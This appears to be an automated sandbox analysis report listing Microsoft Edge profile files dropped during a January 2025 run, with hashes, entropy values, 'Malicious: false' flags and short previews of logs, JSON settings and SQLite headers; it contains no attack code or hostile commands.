Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.241898291360317
Encrypted:	false
SSDEEP:	6:iOrvRM0SjN+q2PCHhJ23oH+Tcwt8NIFUtJvRmZZmwPvROB0VkwOCHhJ23oH+TcwY:7i0SjIvBYebpFUtC/wU56YebqJ
MD5:	4A58BA5E8F27E2087BF74B76AAEBA6D4
SHA1:	3462BDA13B583EF258686338251793D1A34DB93A
SHA-256:	304CC2A0E6C10FF0740CAAAE40B1B05998156E26FDB9001CD95C4362AEC96597
SHA-512:	8B065929AD1832FEC2F47A1A1359E7CAB46809C58B3642CFF06EEAA2AAA16921668808202032A44F92F69C9A27CB8FEBF0630143F870AFAF4D2C0E9D154F02E6
Malicious:	false
Preview:	2025/01/09-08:42:28.708 1768 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/09-08:42:28.713 1768 Recovering log #3.2025/01/09-08:42:28.725 1768 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.241898291360317
Encrypted:	false
SSDEEP:	6:iOrvRM0SjN+q2PCHhJ23oH+Tcwt8NIFUtJvRmZZmwPvROB0VkwOCHhJ23oH+TcwY:7i0SjIvBYebpFUtC/wU56YebqJ
MD5:	4A58BA5E8F27E2087BF74B76AAEBA6D4
SHA1:	3462BDA13B583EF258686338251793D1A34DB93A
SHA-256:	304CC2A0E6C10FF0740CAAAE40B1B05998156E26FDB9001CD95C4362AEC96597
SHA-512:	8B065929AD1832FEC2F47A1A1359E7CAB46809C58B3642CFF06EEAA2AAA16921668808202032A44F92F69C9A27CB8FEBF0630143F870AFAF4D2C0E9D154F02E6
Malicious:	false
Preview:	2025/01/09-08:42:28.708 1768 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/09-08:42:28.713 1768 Recovering log #3.2025/01/09-08:42:28.725 1768 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	0.21861961848037048
Encrypted:	false
SSDEEP:	3:Gl/59tFlljq7A/mhWJFuQ3yy7IOWUHmlotdweytllrE9SFcTp4AGbNCV9RUIt:AG75fOgud0Xi99pEYj
MD5:	30AAAD927B36F26D115D87BF5A25B5BD
SHA1:	7342C100F3BF9ECE3DC92F741BC2B39C76030BB4
SHA-256:	A6E7720F09BDE86933499211A175036A9DDA89E44AC1AB2A678ECE86D0EED28E
SHA-512:	EA83D8F0F3AE71004290554B11F4677350A1914F8AA0ABD8BD649B16F47DC90AE69C49859B608E0AACEA759185AF4B1444C309D8838979323B4446C4B59FCE0F
Malicious:	false
Preview:	...............;...&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.354992509188173
Encrypted:	false
SSDEEP:	12:7DXBvBYeb8rcHEZrELFUt1X8/fXLz56Yeb8rcHEZrEZSJ:7D9BYeb8nZrExg1m56Yeb8nZrEZe
MD5:	624C1A0195204A9CC66E7E71033D150A
SHA1:	96E8D7B3F40F9C4EF712E0C3FE7E7436C82D07AE
SHA-256:	2FF30CDF2CE792E87FA9DEF42524B31889392D2CAF2DE69EE1428649EEB0AC0D
SHA-512:	E1C3ECA25AC17942C0741DE3C23929D4212A997CF6DF32A65B65B2764815502695201CD8D4CD567F544BFDA9D2BC0B5CE28EA579616AC247B93AA2A6FB5B3FA3
Malicious:	false
Preview:	2025/01/09-08:42:33.267 1768 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-08:42:33.267 1768 Recovering log #3.2025/01/09-08:42:33.268 1768 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.354992509188173
Encrypted:	false
SSDEEP:	12:7DXBvBYeb8rcHEZrELFUt1X8/fXLz56Yeb8rcHEZrEZSJ:7D9BYeb8nZrExg1m56Yeb8nZrEZe
MD5:	624C1A0195204A9CC66E7E71033D150A
SHA1:	96E8D7B3F40F9C4EF712E0C3FE7E7436C82D07AE
SHA-256:	2FF30CDF2CE792E87FA9DEF42524B31889392D2CAF2DE69EE1428649EEB0AC0D
SHA-512:	E1C3ECA25AC17942C0741DE3C23929D4212A997CF6DF32A65B65B2764815502695201CD8D4CD567F544BFDA9D2BC0B5CE28EA579616AC247B93AA2A6FB5B3FA3
Malicious:	false
Preview:	2025/01/09-08:42:33.267 1768 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-08:42:33.267 1768 Recovering log #3.2025/01/09-08:42:33.268 1768 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1602
Entropy (8bit):	5.594780521367407
Encrypted:	false
SSDEEP:	48:UZXEWIQNBBH5rXZ6eRV03Sx497AHHk2GJ348ylsSWyG:UqMNBBZTceBZdP8osSA
MD5:	2DD868330302C9CBC163CF5B6A3FE1FC
SHA1:	70D48B9EB33CC3B21BACF386D203E48E755E8DAB
SHA-256:	EEBFFFE97D1F9EDA81804C98E9E545AF596F970C1047AEEB7502EBC6BA7D52D9
SHA-512:	46E8BEFF8A35BA34C3D58C405C23A1B799FC83009036E8E8FD2D3976FBBDBC3FC11573D0474918D568DC8A39B05B755D0A7AF007D62105CB08354B0415DF230D
Malicious:	false
Preview:	.d..;................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult@.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":1004}.!_https://ntp.msn.com..LastKnownPV..1736430156550.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736430157573.._https://ntp.msn.com..MUID!.0CF28CAF1D4764FC3C1D99C01CEF65B6.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736430156631,"schedule":[28,-1,29,33,-1,-1,-1],"scheduleFixed":[28,-1,29,33,-1,-1,-1],"simpleSchedule":[36,35,30,9,17,18,38]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736430156516.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250109.199"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_htt

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.219541596188093
Encrypted:	false
SSDEEP:	6:iOrvRylM+q2PCHhJ23oH+Tcwt8a2jMGIFUtJvRLFT6ZmwPvRuVBMVkwOCHhJ23oL:78M+vBYeb8EFUtLFT6/aBMV56Yeb8bJ
MD5:	C610AABEE87875B9E1AB4D44EA13BDCF
SHA1:	73626ED53643D0A1E3C72364780C4EFADF3389E2
SHA-256:	D8F4E9DD91BAEB5B13DC704E6A502A092D55CD686F5228516081534B3E842D0F
SHA-512:	500144F4344CB5B5A1EFBD17BF290EA424C51203DC044F1AA40AED2BBB47C1947ED9636BBA03364924F3AB0E93AFFC5936058F7231E41A7E7708C230D7D3DDE8
Malicious:	false
Preview:	2025/01/09-08:42:28.177 66c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:42:28.178 66c Recovering log #3.2025/01/09-08:42:28.182 66c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.219541596188093
Encrypted:	false
SSDEEP:	6:iOrvRylM+q2PCHhJ23oH+Tcwt8a2jMGIFUtJvRLFT6ZmwPvRuVBMVkwOCHhJ23oL:78M+vBYeb8EFUtLFT6/aBMV56Yeb8bJ
MD5:	C610AABEE87875B9E1AB4D44EA13BDCF
SHA1:	73626ED53643D0A1E3C72364780C4EFADF3389E2
SHA-256:	D8F4E9DD91BAEB5B13DC704E6A502A092D55CD686F5228516081534B3E842D0F
SHA-512:	500144F4344CB5B5A1EFBD17BF290EA424C51203DC044F1AA40AED2BBB47C1947ED9636BBA03364924F3AB0E93AFFC5936058F7231E41A7E7708C230D7D3DDE8
Malicious:	false
Preview:	2025/01/09-08:42:28.177 66c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:42:28.178 66c Recovering log #3.2025/01/09-08:42:28.182 66c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\0e755982-fd3a-428f-80a0-de3f946871c4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\83c8c4bd-7563-40ac-91c8-1c71bad63581.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\892a7142-682f-4ad3-9a86-2e0d7aee4ec2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\8db78a74-dbcb-4ad8-9997-7426e1afee67.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.763139256956998
Encrypted:	false
SSDEEP:	192:tTD5kHHX6bii4ZsZdEjtxk+g/WD+d2XerrXTvf5fV2kk52uU68cyq7Xcf0L/ZJVb:VD5BSiQI+Sf0QKjUMygXI0LhJVb
MD5:	BE0EBB95ACF6145E436F09CA03B32D57
SHA1:	5F8E14F76212943B5B9B41141B48C0C5586CA880
SHA-256:	C30F23E165602277DEBC8337DBCB620132BBBB2271AC7582FB9A60B3F4260E20
SHA-512:	76E4B2525FE7B82521C263920E7E7589B8DC02D904393A67A911BBCD24EA9A697EBBD95FA08C0CBB6223036DD30EB2F97ABD1D6054D08A32D7F56B529ABBB9C0
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.278489617028502
Encrypted:	false
SSDEEP:	48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBw9/:OIEumQv8m1ccnvS6mJmdKiicz1a
MD5:	F2A641A95D97993AF727B5D8E4AAC58C
SHA1:	23CEF2C293DDA0DBDAA4BFC87AD541C92A97E5AF
SHA-256:	60EC1D6DF7BB819CB8034967463D6BD2624CDE228336532D4AD63FFCBFA479AB
SHA-512:	54D80A254FA7D100E18D453FCB42F21C6E56563F7F30A0B5860260C839771C5689FF434775E3E91D15D59DF717A2C009CEAE4508238823AE5A27D52DCA72DF71
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF35e7c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF36fe2.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF37957.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\dcdd6fd3-910b-41bc-a882-d7112c4aa18a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8350301952073809
Encrypted:	false
SSDEEP:	24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
MD5:	0DAD8D7F079797377CD56DAE47E1A619
SHA1:	A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
SHA-256:	7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
SHA-512:	5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10980
Entropy (8bit):	5.223867385503494
Encrypted:	false
SSDEEP:	192:stpkdp1sPeoIa34Fon2ekTdPYDj8ibV+Fv9Qwt4o3q7NIiPPYJ:stpQ1sGoXYouUbGVQwWo67NIv
MD5:	254CCB6B1E1274CF8B55E5F2D239816F
SHA1:	FD4E20FAFC839059BDA19C091ABBFFE17389FBFC
SHA-256:	CA87594455C9EA3584C05E939126EA07A79472E11C82E9B6370A05D4A48E30E7
SHA-512:	3097CC384222A6B46F70BEFBBB7FB6C42A39631DC891B53FCB51808EB02BB2F05513A862032B2DE49C9581A516AD67D347E780BAE0B10D93A12690F8A313AD0E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748391374","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF39b37.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10980
Entropy (8bit):	5.223867385503494
Encrypted:	false
SSDEEP:	192:stpkdp1sPeoIa34Fon2ekTdPYDj8ibV+Fv9Qwt4o3q7NIiPPYJ:stpQ1sGoXYouUbGVQwWo67NIv
MD5:	254CCB6B1E1274CF8B55E5F2D239816F
SHA1:	FD4E20FAFC839059BDA19C091ABBFFE17389FBFC
SHA-256:	CA87594455C9EA3584C05E939126EA07A79472E11C82E9B6370A05D4A48E30E7
SHA-512:	3097CC384222A6B46F70BEFBBB7FB6C42A39631DC891B53FCB51808EB02BB2F05513A862032B2DE49C9581A516AD67D347E780BAE0B10D93A12690F8A313AD0E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748391374","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3e967.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10980
Entropy (8bit):	5.223867385503494
Encrypted:	false
SSDEEP:	192:stpkdp1sPeoIa34Fon2ekTdPYDj8ibV+Fv9Qwt4o3q7NIiPPYJ:stpQ1sGoXYouUbGVQwWo67NIv
MD5:	254CCB6B1E1274CF8B55E5F2D239816F
SHA1:	FD4E20FAFC839059BDA19C091ABBFFE17389FBFC
SHA-256:	CA87594455C9EA3584C05E939126EA07A79472E11C82E9B6370A05D4A48E30E7
SHA-512:	3097CC384222A6B46F70BEFBBB7FB6C42A39631DC891B53FCB51808EB02BB2F05513A862032B2DE49C9581A516AD67D347E780BAE0B10D93A12690F8A313AD0E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748391374","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF45e97.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10980
Entropy (8bit):	5.223867385503494
Encrypted:	false
SSDEEP:	192:stpkdp1sPeoIa34Fon2ekTdPYDj8ibV+Fv9Qwt4o3q7NIiPPYJ:stpQ1sGoXYouUbGVQwWo67NIv
MD5:	254CCB6B1E1274CF8B55E5F2D239816F
SHA1:	FD4E20FAFC839059BDA19C091ABBFFE17389FBFC
